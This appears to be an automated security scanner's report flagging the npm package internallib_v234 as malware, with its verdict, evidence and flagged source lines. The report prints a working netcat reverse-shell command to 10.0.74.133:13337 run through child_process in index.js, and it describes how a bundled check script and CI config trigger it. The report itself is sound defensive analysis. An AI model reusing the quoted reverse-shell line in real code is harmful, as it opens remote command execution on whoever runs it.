
internallib_v234@1.0.6

AI Security Review

scanned 5h ago · by lpm-firewall-ai

The package entrypoint exposes a command that launches a netcat reverse shell to a hardcoded private IP and port. A bundled check script and CI config invoke that command.

Static reason: High-risk behavior combination matched malicious policy.
Trigger: Calling exports.command(), including via node check.js in CI.
Impact: Remote shell execution from the consuming environment when the command is invoked.
Mechanism: child_process exec netcat reverse shell.
Attack narrative: When command() is invoked, index.js first checks for netcat and then executes a bash command that starts nc to 10.0.74.133:13337 with /bin/bash attached. The included check.js calls this export, and the GitLab CI config runs check.js, creating a reachable reverse-shell path in automated environments.
Rationale: Direct source inspection confirms concrete reverse-shell behavior reachable through the package export and bundled CI check script. This is not package-aligned functionality and enables unauthorized remote command execution.
Evidence: index.js, check.js, package.json, .gitlab-ci.yml, /bin/bash
Network endpoints (1): 10.0.74.133:13337

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • index.js exports command() that runs child_process.exec.
  • index.js probes for nc with whereis nc.
  • index.js executes /bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash".
  • check.js imports internallib_v234 and calls command().
  • .gitlab-ci.yml runs node check.js after npm update, making the reverse shell reachable in CI.
Evidence against
  • package.json has no npm lifecycle hook.
  • No credential harvesting or file exfiltration code found beyond the reverse shell.
Behavioral surface
Source: ChildProcess, Shell
Supply chain: No supply-chain packaging signals triggered.
Manifest: No manifest risk signals triggered.
Scanned 2 file(s), 444 B of source.

Source & flagged code

4 flagged
index.js (flagged source excerpt)
    L1: const { exec } = require('child_process');
    L2-L5: ...
    L6: exec('whereis nc', (error, stdout, stderr) => {
    L7: if (error) { ...
    L13:
    L14: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"');
    L15:
Critical
Reverse Shell

Source matches reverse-shell style process and socket wiring.

index.js · L1
Trigger-reachable chain: manifest.main -> index.js
index.js (flagged source excerpt)
    L1: const { exec } = require('child_process');
    L2-L5: ...
    L6: exec('whereis nc', (error, stdout, stderr) => {
    L7: if (error) { ...
    L13:
    L14: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"');
    L15:
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.js · L1
index.js (flagged source excerpt)
    L1: const { exec } = require('child_process');
    L2:
High
Child Process

Package source references child process execution.

index.js · L1
index.js (flagged source excerpt)
    L13:
    L14: exec('/bin/bash -c "nc -vn 10.0.74.133 13337 -e /bin/bash"');
    L15:
High
Shell

Package source references shell execution.

index.js · L13

Findings

2 Critical · 2 High · 1 Low
Critical: Reverse Shell (index.js)
Critical: Trigger Reachable Dangerous Capability (index.js)
High: Child Process (index.js)
High: Shell (index.js)
Low: Scripts Present